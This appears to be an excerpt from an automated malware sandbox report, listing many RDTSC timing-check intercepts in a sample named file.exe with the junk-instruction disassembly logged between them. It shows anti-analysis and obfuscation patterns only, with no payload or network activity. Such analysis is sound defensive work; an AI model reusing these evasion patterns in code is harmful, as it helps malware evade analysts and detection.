                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88826 second address: E8882C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8882C second address: E88869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3DE9170BE8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+124484A4h] 0x00000015 pushad 0x00000016 sub di, CE5Ah 0x0000001b popad 0x0000001c push 00000004h 0x0000001e jns 00007F3DE9170BE7h 0x00000024 clc 0x00000025 nop 0x00000026 jc 00007F3DE9170C01h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3DE9170BEFh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88869 second address: E8886D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8886D second address: E88884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3DE9170BEEh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88884 second address: E8888E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3DE916F95Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE37BC second address: EE37C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE37C2 second address: EE37E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3DE916F969h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE37E0 second address: EE3804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F3DE9170BF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F3DE9170BE6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3804 second address: EE3808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBC8 second address: EEBBD6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3DE9170BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBD6 second address: EEBBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBDA second address: EEBBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC69B second address: EEC6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3DE916F95Bh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F3DE916F95Fh 0x00000012 jl 00007F3DE916F956h 0x00000018 js 00007F3DE916F956h 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC6CC second address: EEC6E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F3DE9170BF3h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC6E9 second address: EEC6F3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3DE916F956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EECC68 second address: EECC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF03BF second address: EF03CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F3DE916F956h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF03CC second address: EF03E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jng 00007F3DE9170BE6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F3DE9170BE6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF03E6 second address: EF03EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0522 second address: EF0526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0526 second address: EF052C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF06B4 second address: EF06BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0C97 second address: EF0CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3DE916F96Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0CA3 second address: EF0CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BF3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0CBA second address: EF0CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3DE916F963h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0DDC second address: EF0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0DE2 second address: EF0DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007F3DE916F956h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0DF3 second address: EF0DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0F85 second address: EF0F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0F8A second address: EF0F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BEFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0F9D second address: EF0FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0FA1 second address: EF0FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7C36 second address: EF7C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F961h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7C4D second address: EF7C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF7F4 second address: EFF7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF7F9 second address: EFF7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF7FF second address: EFF805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF805 second address: EFF810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE01E second address: EFE022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE6FB second address: EFE700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE700 second address: EFE705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE705 second address: EFE70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE70B second address: EFE711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE711 second address: EFE71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F3DE9170BE6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F07271 second address: F07275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F13ABA second address: F13AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F13AC2 second address: F13ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE916F964h 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F13ADB second address: F13AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3DE9170BE6h 0x00000009 jns 00007F3DE9170BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17EBA second address: F17EC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17EC4 second address: F17ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17ED8 second address: F17EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17EE6 second address: F17F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3DE9170BF6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F3DE9170BE6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F14 second address: F17F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F1A second address: F17F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17F20 second address: F17F25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17912 second address: F17918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17918 second address: F17953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE916F966h 0x00000009 jo 00007F3DE916F96Dh 0x0000000f jmp 00007F3DE916F967h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17953 second address: F17957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17957 second address: F17971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007F3DE916F966h 0x0000000f pushad 0x00000010 jne 00007F3DE916F956h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D7B8 second address: F1D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3DE9170BEEh 0x0000000a jne 00007F3DE9170BF2h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jng 00007F3DE9170BE6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D7E9 second address: F1D802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F3DE916F964h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28DB6 second address: F28DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28DBA second address: F28DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jg 00007F3DE916F956h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3DE916F966h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28DE4 second address: F28E10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEEh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F3DE9170BF3h 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F229 second address: F2F22D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F22D second address: F2F23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3DE9170BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DC0E second address: F2DC18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3DE916F962h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DC18 second address: F2DC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DC1E second address: F2DC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3DE916F95Eh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E16F second address: F2E175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E175 second address: F2E180 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E2C6 second address: F2E2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3DE9170BF7h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E2E6 second address: F2E2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E2EC second address: F2E2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C7D0 second address: F3C7DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF96 second address: F3DF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DD6C second address: E4DD77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3DE916F956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46584 second address: F46588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46588 second address: F4658E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4658E second address: F465CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jmp 00007F3DE9170BF7h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F3DE9170BF9h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F465CE second address: F465D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F465D4 second address: F465DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F465DA second address: F465DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47C0B second address: F47C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 jbe 00007F3DE9170BE6h 0x0000000e jmp 00007F3DE9170BF8h 0x00000013 pop edi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B472 second address: F4B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B477 second address: F4B493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7153A second address: F71569 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3DE916F964h 0x00000008 pushad 0x00000009 jmp 00007F3DE916F964h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F709C2 second address: F709C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70DFC second address: F70E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F967h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70E17 second address: F70E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jg 00007F3DE9170BE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70E26 second address: F70E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73F8B second address: F73F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F741A2 second address: F741BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F3DE916F956h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F741BF second address: F741C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F741C5 second address: F7422F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F3DE916F961h 0x0000000f jmp 00007F3DE916F961h 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F3DE916F958h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D3507h], eax 0x00000037 push 06746D35h 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F3DE916F958h 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F75799 second address: F757B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F757B2 second address: F757B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F757B6 second address: F757BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7745A second address: F7745E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E45469 second address: E4546F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4546F second address: E45477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E45477 second address: E4548A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F3DE9170BEEh 0x0000000b rdtsc
